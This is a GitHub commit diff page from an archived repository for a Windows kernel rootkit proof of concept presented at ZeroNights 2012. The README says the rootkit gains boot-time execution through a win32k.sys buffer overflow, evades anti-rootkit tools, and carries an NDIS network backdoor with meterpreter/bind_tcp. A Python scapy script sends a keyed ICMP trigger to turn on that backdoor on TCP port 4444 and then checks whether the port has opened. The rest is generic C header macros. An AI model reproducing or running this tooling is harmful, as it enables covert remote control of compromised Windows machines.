This repository has been archived by the owner on May 14, 2022. It is now read-only.
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
45 changed files
with
8,992 additions
and
8,992 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,30 +1,30 @@ | ||
|
||
****************************************************************************** | ||
|
||
Kernel rootkit, that lives inside the Windows registry value data. | ||
By Oleksiuk Dmytro (aka Cr4sh) | ||
|
||
http://twitter.com/d_olex | ||
http://blog.cr4.sh | ||
cr4sh0@gmail.com | ||
|
||
****************************************************************************** | ||
|
||
Rootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup. | ||
|
||
Features: | ||
|
||
* NDIS-based network backdoor (+ meterpreter/bind_tcp). | ||
|
||
* In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers. | ||
|
||
* Completely undetectable by public anti-rootkit tools. | ||
|
||
* Working on Windows 7 (SP0, SP1) x86. | ||
|
||
|
||
![foo](http://dl.dropbox.com/u/22903093/WindowsRegistryRootkit-execution.png) | ||
|
||
|
||
This rootkit was originally presented at the ZeroNights 2012 conference during my talk. | ||
See the slides and videos for more information: http://dl.dropbox.com/u/22903093/Applied-anti-forensics.pdf | ||
|
||
****************************************************************************** | ||
|
||
Kernel rootkit, that lives inside the Windows registry value data. | ||
By Oleksiuk Dmytro (aka Cr4sh) | ||
|
||
http://twitter.com/d_olex | ||
http://blog.cr4.sh | ||
cr4sh0@gmail.com | ||
|
||
****************************************************************************** | ||
|
||
Rootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup. | ||
|
||
Features: | ||
|
||
* NDIS-based network backdoor (+ meterpreter/bind_tcp). | ||
|
||
* In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers. | ||
|
||
* Completely undetectable by public anti-rootkit tools. | ||
|
||
* Working on Windows 7 (SP0, SP1) x86. | ||
|
||
|
||
![foo](http://dl.dropbox.com/u/22903093/WindowsRegistryRootkit-execution.png) | ||
|
||
|
||
This rootkit was originally presented at the ZeroNights 2012 conference during my talk. | ||
See the slides and videos for more information: http://dl.dropbox.com/u/22903093/Applied-anti-forensics.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,88 +1,88 @@ | ||
##################################################################### | ||
# | ||
# Windows kernrel rootkit PoC using registry values processing BoF. | ||
# | ||
# Script for meterpreter/bind_tcp backdoor activation on TCP/4444 | ||
# port of infected target. | ||
# | ||
# (c) 2012, Oleksiuk Dmytro (aka Cr4sh) | ||
# cr4sh@riseup.net | ||
# | ||
##################################################################### | ||
|
||
import sys, os | ||
from optparse import OptionParser | ||
|
||
BACKDOOR_PORT_NUMBER = 4444 | ||
TIMEOUT = 5 | ||
|
||
try: | ||
|
||
# import scapy stuff | ||
from scapy.all import * | ||
|
||
except Exception, why: | ||
|
||
print "[!] Exception while importing module: " + str(why) | ||
print "[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?" | ||
sys.exit() | ||
|
||
if __name__ == '__main__': | ||
|
||
print "***********************************************************\n" | ||
print " Windows kernrel rootkit PoC using registry values processing BoF.\n" | ||
print " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)" | ||
print " cr4sh@riseup.net\n" | ||
print "***********************************************************\n" | ||
|
||
parser = OptionParser() | ||
|
||
parser.add_option("-k", "--key", dest = "key", default = None, | ||
help = "Rootkit secret key.") | ||
|
||
parser.add_option("-d", "--dst", dest = "dst", default = None, | ||
help = "Destination host IP address.") | ||
|
||
# parse command line | ||
(options, args) = parser.parse_args() | ||
|
||
if options.key is None or options.dst is None: | ||
|
||
print "[!] Please specify --dst and --key options" | ||
sys.exit() | ||
|
||
print "[+] Destination host IP address: ", options.dst | ||
print "[+] Rootkit secret key: ", options.key | ||
print "[+] Backdoor port: ", str(BACKDOOR_PORT_NUMBER) | ||
|
||
# allocate IP + ICMP packets | ||
ip = IP(dst = options.dst) | ||
icmp = ICMP(type = 8, code = 0) | ||
data = "RKCTL:" + options.key | ||
|
||
# send it over the network | ||
sr1(ip/icmp/data, timeout = TIMEOUT) | ||
|
||
# scan for opened backdoor port | ||
ip = IP(dst = options.dst) | ||
TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) | ||
|
||
# send SYN packet and wait for the first reply | ||
TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) | ||
|
||
# SEQ Number for SYN-ACK | ||
if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12: | ||
|
||
# response from our target aka hostip - expect RST | ||
print "[+] Port %d is closed" % BACKDOOR_PORT_NUMBER | ||
|
||
else: | ||
|
||
print "[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp" % BACKDOOR_PORT_NUMBER | ||
print "[+] It will be closed immediately after 'exit' command in meterpreter shell" | ||
|
||
# if end | ||
|
||
# | ||
# EoF | ||
# | ||
##################################################################### | ||
# | ||
# Windows kernrel rootkit PoC using registry values processing BoF. | ||
# | ||
# Script for meterpreter/bind_tcp backdoor activation on TCP/4444 | ||
# port of infected target. | ||
# | ||
# (c) 2012, Oleksiuk Dmytro (aka Cr4sh) | ||
# cr4sh@riseup.net | ||
# | ||
##################################################################### | ||
|
||
import sys, os | ||
from optparse import OptionParser | ||
|
||
BACKDOOR_PORT_NUMBER = 4444 | ||
TIMEOUT = 5 | ||
|
||
try: | ||
|
||
# import scapy stuff | ||
from scapy.all import * | ||
|
||
except Exception, why: | ||
|
||
print "[!] Exception while importing module: " + str(why) | ||
print "[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?" | ||
sys.exit() | ||
|
||
if __name__ == '__main__': | ||
|
||
print "***********************************************************\n" | ||
print " Windows kernrel rootkit PoC using registry values processing BoF.\n" | ||
print " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)" | ||
print " cr4sh@riseup.net\n" | ||
print "***********************************************************\n" | ||
|
||
parser = OptionParser() | ||
|
||
parser.add_option("-k", "--key", dest = "key", default = None, | ||
help = "Rootkit secret key.") | ||
|
||
parser.add_option("-d", "--dst", dest = "dst", default = None, | ||
help = "Destination host IP address.") | ||
|
||
# parse command line | ||
(options, args) = parser.parse_args() | ||
|
||
if options.key is None or options.dst is None: | ||
|
||
print "[!] Please specify --dst and --key options" | ||
sys.exit() | ||
|
||
print "[+] Destination host IP address: ", options.dst | ||
print "[+] Rootkit secret key: ", options.key | ||
print "[+] Backdoor port: ", str(BACKDOOR_PORT_NUMBER) | ||
|
||
# allocate IP + ICMP packets | ||
ip = IP(dst = options.dst) | ||
icmp = ICMP(type = 8, code = 0) | ||
data = "RKCTL:" + options.key | ||
|
||
# send it over the network | ||
sr1(ip/icmp/data, timeout = TIMEOUT) | ||
|
||
# scan for opened backdoor port | ||
ip = IP(dst = options.dst) | ||
TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) | ||
|
||
# send SYN packet and wait for the first reply | ||
TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) | ||
|
||
# SEQ Number for SYN-ACK | ||
if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12: | ||
|
||
# response from our target aka hostip - expect RST | ||
print "[+] Port %d is closed" % BACKDOOR_PORT_NUMBER | ||
|
||
else: | ||
|
||
print "[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp" % BACKDOOR_PORT_NUMBER | ||
print "[+] It will be closed immediately after 'exit' command in meterpreter shell" | ||
|
||
# if end | ||
|
||
# | ||
# EoF | ||
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,9 +1,9 @@ | ||
#define CATCHY_ERROR 0xffffffff | ||
|
||
#ifdef __cplusplus | ||
extern "C" { | ||
#endif | ||
ULONG __cdecl c_Catchy(PVOID); | ||
#ifdef __cplusplus | ||
} | ||
#endif | ||
#define CATCHY_ERROR 0xffffffff | ||
|
||
#ifdef __cplusplus | ||
extern "C" { | ||
#endif | ||
ULONG __cdecl c_Catchy(PVOID); | ||
#ifdef __cplusplus | ||
} | ||
#endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,33 +1,33 @@ | ||
|
||
#define TIME_ABSOLUTE(wait) (wait) | ||
#define TIME_RELATIVE(wait) (-(wait)) | ||
#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L) | ||
#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L)) | ||
#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L)) | ||
#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L)) | ||
|
||
#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_)) | ||
|
||
#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1)) | ||
#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_)) | ||
|
||
#define IFMT32 "0x%.8x" | ||
#define IFMT64 "0x%.16I64x" | ||
|
||
|
||
#define GET_NATIVE(_name_) \ | ||
\ | ||
func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \ | ||
GetModuleHandle("ntdll.dll"), \ | ||
(#_name_) \ | ||
); | ||
|
||
#if defined(_X86_) | ||
|
||
#define IFMT IFMT32 | ||
|
||
#elif defined(_AMD64_) | ||
|
||
#define IFMT IFMT64 | ||
|
||
#endif | ||
|
||
#define TIME_ABSOLUTE(wait) (wait) | ||
#define TIME_RELATIVE(wait) (-(wait)) | ||
#define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L) | ||
#define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L)) | ||
#define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L)) | ||
#define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L)) | ||
|
||
#define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_)) | ||
|
||
#define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1)) | ||
#define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_)) | ||
|
||
#define IFMT32 "0x%.8x" | ||
#define IFMT64 "0x%.16I64x" | ||
|
||
|
||
#define GET_NATIVE(_name_) \ | ||
\ | ||
func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \ | ||
GetModuleHandle("ntdll.dll"), \ | ||
(#_name_) \ | ||
); | ||
|
||
#if defined(_X86_) | ||
|
||
#define IFMT IFMT32 | ||
|
||
#elif defined(_AMD64_) | ||
|
||
#define IFMT IFMT64 | ||
|
||
#endif |
Oops, something went wrong.